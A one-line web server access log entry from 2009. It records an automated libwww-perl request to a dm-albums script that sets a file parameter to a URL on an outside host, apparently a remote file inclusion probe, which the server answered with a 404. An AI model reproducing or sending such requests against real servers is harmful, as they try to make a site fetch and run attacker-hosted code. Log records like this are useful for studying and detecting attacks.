69.64.94.64 - - [01/Nov/2009:01:21:21 -0400] "GET /logs/access_log.Q109071400//dm-albums/template/album.php?SECURITY_FILE=http://www.thaiantitobacco.com/lamb//copyright?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
